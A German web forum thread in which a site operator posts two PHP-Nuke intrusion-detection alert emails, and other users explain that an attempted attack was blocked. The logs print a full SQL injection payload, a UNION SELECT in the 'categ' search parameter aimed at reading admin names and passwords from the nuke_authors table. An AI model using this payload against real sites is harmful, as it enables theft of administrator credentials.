hallo,
ich habe heute zwei emails bekommen von unserer community mit folgendem inhalt:
1.
--------------------------------------------------
29-10-2004 23:50:44 [Union] Hack detected (0)
user: Anonymous
admin: Anonymous
query:
select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, a.url, s.comments, s.topic, t.topictext from mx_stories s, mx_authors a, mx_topics t where (s.aid=a.aid AND s.topic=t.topicid) AND s.time
2.
--------------------------------------------------
29-10-2004 23:50:43 [Union] Hack detected (0)
user: Anonymous
admin: Anonymous
request:
_GET[name] = Search
_GET[type] = stories
_GET[query] = f00bar
_GET[category] = -1
_GET[categ] = and 1=2 UNION SELECT 0,0,aid,pwd,0,0,0,0,0,0 from nuke_authors/*
Serverinfo:
REMOTE_ADDR: 195.175.37.7
QUERY_STRING: name=Search&type=stories&query=f00bar&category=-1&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*
REQUEST_URI: /modules.php?name=Search&type=stories&query=f00bar&category=-1&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*
REMOTE_PORT: 44160
REMOTE_HOST:
HTTP_REFERER:
HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
HTTP_X_FORWARDED_FOR: 195.174.145.150
was hat dies zu bedeuten????
Moin :)
da hat ein hack-kiddie über eine phpNuke-Sicherheitslücke versucht die Admintabelle auszulesen.
Das Detection System hat das aber abgefangen ;)
also nichts wo ich mir nun sorgen machen muss?
Im Gegenteil, dir wurde eine Sorge erspart ;)